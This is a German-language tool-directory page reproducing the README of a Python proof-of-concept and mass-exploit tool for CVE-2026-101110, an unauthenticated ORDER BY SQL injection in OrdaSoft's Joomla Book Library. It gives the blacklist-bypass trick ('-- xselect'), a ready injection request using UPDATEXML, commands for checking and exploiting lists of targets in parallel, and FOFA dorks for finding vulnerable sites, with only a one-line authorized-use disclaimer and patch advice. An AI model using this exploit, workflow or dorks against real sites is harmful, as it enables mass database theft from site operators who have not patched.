Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-101110 — Python-3-PoC und Massen-Exploit für CVE-2026-101110, eine unauthentifizierte ORDER-BY-SQL-Injection in OrdaSoft Joomla Book Library <=6.4.6 über die Parameter field/direction. | Kitploit
Tools/GitHubGitHub/murrez/cve-2026-101110
AufklärungSchwachstellenscannerSchwachstellenanalyseExploitationScripting & AutomatisierungWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubmurrez/cve-2026-101110

CVE-2026-101110

Python-3-PoC und Massen-Exploit für CVE-2026-101110, eine unauthentifizierte ORDER-BY-SQL-Injection in OrdaSoft Joomla Book Library <=6.4.6 über die Parameter field/direction.

vor 4 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
Teilen

CVE-2026-101110 — OrdaSoft Book Library (Free) unauthentifizierte SQL-Injection

Python-3-PoC für CVE-2026-101110 — OrdaSoft Book Library (Free) für Joomla ≤ 6.4.6. Upgrade auf 6.4.7+.

PoCbithttps://pocbit.org/pocs/cve-2026-101110
Kataloghttps://pocbit.org/pocs/
Komponentecom_booklibrary
Datei / Funktionsite/booklibrary.php → books()
Parameterfield, direction (Sortierung)
AuthKeine (öffentliche Buchlisten)
CWECWE-89 SQL Injection
CVSS 4.09.3 Kritisch (Joomla CNA)
CreditAla Arfaoui

Zusammenfassung der Schwachstelle (Türkçe)

Book Library (Free) ist ein OrdaSoft-Plugin, das Buchbibliotheks- / Kategorielisten in Joomla bereitstellt. In den Versionen 6.4.6 und früher filtert die Funktion books() die Parameter field und direction mit protectInjectionWithoutQuote(). Diese Funktion implementiert lediglich eine schwache Blacklist, die nach der Teilzeichenkette select sucht; wird sie gefunden, wird der Wert mit $db->quote() umschlossen, aber nicht abgelehnt.

Die Werte werden anschließend in einen unquotierten ORDER BY-Ausdruck eingefügt — die Verwendung von Quotes an dieser Stelle verhindert keine SQL-Injection (CNA-Beschreibung).

Für die Ausnutzung sind zwei Bedingungen erforderlich:

  1. Session-Priming: Die erste Anfrage schreibt die in der Session gespeicherten Standard-Sortierwerte (field / direction).
  2. Blacklist-Bypass: In der zweiten Anfrage wird am Ende der Payload der Decoy-Kommentar -- xselect angehängt; dieser passiert die Blacklist-Prüfung, und der SQL-Kommentar neutralisiert den Rest der Payload.

Ergebnis: ORDER BY SQLi ohne Authentifizierung, kritisches Risiko für Datenbank-Lese-/Schreibzugriff und Site-Integrität.


Technischer Mechanismus

Request 1 (prime):  ...&field=title&direction=ASC   → session sort defaults
Request 2 (inject): ...&field=<expr> -- xselect&direction=ASC
                      └─ concatenated into ORDER BY (unquoted)

Schwacher Filter (konzeptionell):

  • Eingabe enthält select (Teilzeichenkette) → gesamten Wert in Quotes einschließen (irrelevant im ORDER BY-Kontext).
  • Angreifer fügt -- xselect hinzu, sodass die Blacklist select innerhalb des Kommentar-Endes sieht, während der aktive Ausdruck vor -- weiterhin ausführbares SQL bleibt (error-based / UPDATEXML / gestapelte ORDER BY-Tricks).

PoC implementiert:

SchrittAktion
Fingerprintcom_booklibrary-Pfade + optionale Manifest-Version
Route DiscoveryshowCategory, search, showBooks, books, … + gescrapte catid / Itemid
checkSession primen → SQLi bestätigen (Flag / VERSION())
exploitPrime → --subquery-Extraktion (Standard SELECT VERSION())
mass--list + -j parallele Ziele; exploited.txt bei erfolgreichem Leak

Payload-Suffix-Konstante im Code: -- xselect (BLACKLIST_DECOY).


Voraussetzungen

cd CVE-2026-101110
pip install -r requirements.txt

Verwendung

Einzelnes Ziel

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"

Massenverarbeitung (Exploit-First-Workflow)

python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 12 --subquery "SELECT VERSION()" --exploited-list exploited.txt
FlagBedeutung
--aggressiveCheck-Modus versucht Versions-Leak nach dem Prime
--subqueryInnerer Ausdruck für UPDATEXML / Double-Query-Payloads
--exploited-listTab-getrennte erfolgreiche Extraktionen
--no-colorANSI deaktivieren (auch NO_COLOR)

JSONL: pocbit, pocbit_catalog, pocbit_page, cve, component, session_primed.


Beispiel-HTTP

Prime (Session):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=title&direction=ASC HTTP/1.1

Inject (PoC hängt Decoy an):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=UPDATEXML(1,CONCAT(0x7e,(VERSION()),0x7e),1) -- xselect&direction=ASC HTTP/1.1

POST-Varianten werden auf derselben Route versucht, wenn GET fehlschlägt.


Versionserkennung

Manifest (falls exponiert):

  • /administrator/components/com_booklibrary/booklibrary.xml

≤ 6.4.6 → anfällige Zeile; ≥ 6.4.7 → gepatcht (patched_version in der Check-Ausgabe).


FOFA-Dorks

body="option=com_booklibrary"
body="/components/com_booklibrary/" && body="Joomla"
body="com_booklibrary" && (body="booklibrary" || body="Book Library")
body="ordasoft" && body="booklibrary"

Verwandte OrdaSoft-CVEs (Sep 2026)

CVEErweiterungProblemBehoben
CVE-2026-101110Book LibraryORDER BY SQLi + Blacklist-Bypass6.4.7
CVE-2026-101111Book LibraryReflected XSS (title-Parameter)6.4.7
CVE-2026-101108Vehicle ManagerORDER BY SQLi6.5.8
CVE-2026-100752Real Estate ManagerORDER BY SQLi6.7.9

Patchen Sie alle OrdaSoft-Komponenten, die Sie einsetzen.


Referenzen

  • PoCbit CVE-2026-101110
  • CVE.report CVE-2026-101110
  • OrdaSoft
  • Historisch: ältere com_booklibrary SQLi in Such-/Lend-Tasks (CVE-2010-1522) — andere Codepfade

Rechtliches

Nur autorisiertes Testen und Patch-Validierung.


GitHub-Repository-Beschreibung

CVE-2026-101110 PoC: OrdaSoft Joomla Book Library (Free) <=6.4.6 unauth SQLi — field/direction ORDER BY, session prime + `-- xselect` blacklist bypass (com_booklibrary). Colored check + mass exploit, CVSS 9.3. https://pocbit.org/pocs/cve-2026-101110
Tool herunterladen